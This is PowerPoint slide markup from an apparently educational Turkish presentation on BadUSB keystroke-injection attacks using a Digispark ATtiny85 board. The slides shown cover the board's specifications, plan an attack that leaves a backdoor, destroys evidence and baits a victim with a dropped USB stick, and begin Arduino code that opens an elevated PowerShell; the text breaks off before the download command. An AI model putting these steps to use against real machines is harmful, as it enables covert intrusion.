                <a:effectLst/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="tr-TR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4100" name="Picture 4" descr="Digispark - the convenient ATtiny85 alternative • Wolles Elektronikkiste">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11DD6818-993B-40D2-B322-A493545FB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483" y="2274208"/>
            <a:ext cx="3109383" cy="23095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31972060-6E67-463A-86FE-6C81D0444D1C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8178800" y="4859867"/>
            <a:ext cx="3183467" cy="1815882"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>• 8KB program </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>belleği</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>• 512 byte EEPROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>bellek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>• 512 byte SRAM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>Dahili</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t> USB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>desteği</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>• 6 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>adet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>giriş</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>çıkış</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>pini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t> (2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>tanesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t> USB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>haberleşme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>için</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>kullanılmaktadır</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>• 3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>adet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>pinde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>ayarlanabilir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t> PWM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>çıkışı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>• 4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>adet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>pinde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>ayarlanabilir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t> ADC</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>• </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>Dahili</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t> 5V 150mA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>regülatör</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>• </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>Çalışma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>gerilimi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>: 5V </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>veya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t> Vin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>pini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>üzerinden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t> 7-16V (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>otomatik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>seçilir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>• SPI/TWI(I2C) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>bağlantı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>desteği</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>• </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>Güç</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t> durum/test </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>LED'leri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>• </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>Düşük</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>güç</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>tüketimi</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="tr-TR" sz="800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="413879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4C99457-E2AC-4496-8FB7-27E538C03194}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>BADUSB Siber saldırı senaryolarının oluşturulması</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="İçerik Yer Tutucusu 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C66163A6-34A8-4DF4-854E-9C2FF92711E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="723294" y="1935921"/>
            <a:ext cx="6579205" cy="4722053"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>1. Hedef sisteme fiziksel olarak erişim sağlandığı varsayılmalı ve sistem üzerinde erişim sağlandığı andan itibaren neler yapılabileceği belirlenmelidir.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>2. Fiziksel olarak erişim sağlanmış sistemden sadece klavye ile neler yapılabileceği iyi düşünülmelidir. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>3. Saldırı senaryosu adım adım not edilmeli ve yapılacaklar sırasıyla belirlenmelidir.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>4. Saldırı sonrasında sistem üzerinde kalıcı etkiye sahip olmak için arka kapı bırakılmalı ve kanıtlar yok edilmelidir.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>5. Tüm bu sürecin, kurbanın bilgisayara </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>mikrodenetleyiciyi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> taktıktan sonra saniyeler içerisinde gerçekleşeceği bilinmeli ve bu tuş vuruşu saldırısı esnasında bilgisayarda şüphe uyandıracak hareketler gizlenmelidir.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>6. Saldırı yapacak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>mikrodenetleyicinin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> gerçek bir USB bellek görünümüne sahip olması, üzerinde ilgi çekici yazıların olması hedef tarafından merak uyandıran bir biçimde olması gerekmektedir.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>7. Hedefe doğrudan ya da dolaylı olarak verilen, masasına veya yere bırakılan USB belleğin hedefin ilgisini çekerek alması sağlanmalıdır.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="tr-TR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 2" descr="Rare BadUSB attack detected in the wild against US hospitality provider |  ZDNet">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CFF46D62-6B70-4839-B1D7-983CED4AC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999" y="2428321"/>
            <a:ext cx="4348094" cy="30306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11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F0E9314-E3E6-4A66-A088-AA660BEF5E43}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Hedef sistem üzerinde dosya indirme</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="tr-TR" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="tr-TR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="İçerik Yer Tutucusu 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{275CF5EB-E761-4133-9DA2-58679BE64390}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="913795" y="2096064"/>
            <a:ext cx="6079672" cy="3695136"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Hedef sistem üzerinde dosya indirebilmek için yapılabilecek saldırı senaryosu ve komutlar aşağıdaki gibidir;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Win+R</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> tuşuna basıp çalıştır penceresini aç.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Açılan pencereye </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> yaz.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Yönetici olarak çalıştırmak için CTRL+SHIFT+ENTER tuşla.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Açılacak pencerede sol ok tuşuyla </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>evet’e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> getir ve </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>enter’a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> bas.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Powershellde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> dosya indirebilmek için </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>scriptini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> gir ve </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>enter’a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> bas.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Yukarıdaki senaryo oluşturduktan sonra aşağıdaki gibi komutlar sırasıyla yazılıp </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>mikrodenetleyiciye</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> yüklenmelidir.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="tr-TR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Metin kutusu 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7FCFE98-ADE7-4151-8B88-A2A1361BA0C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7653867" y="2096064"/>
            <a:ext cx="3962400" cy="3939540"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>DigiKeyboard.sendKeyStroke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>(KEY_R, MOD_GUI_LEFT); // Windows + R </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>kombinasyonunun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>tuşla</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>DigiKeyboard.delay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>(2000);  // 2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>saniye</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>bekle</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>DigiKeyboard.print</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>"); // </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>Açılan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>Çalıştır</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>penceresine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>yaz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>DigiKeyboard.delay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>(2000);  // 2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>saniye</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>bekle</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>DigiKeyboard.sendKeyStroke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>(KEY_ENTER,MOD_CONTROL_LEFT|MOD_SHIFT_LEFT); // </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>powershell’i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>yönetici</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>olarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
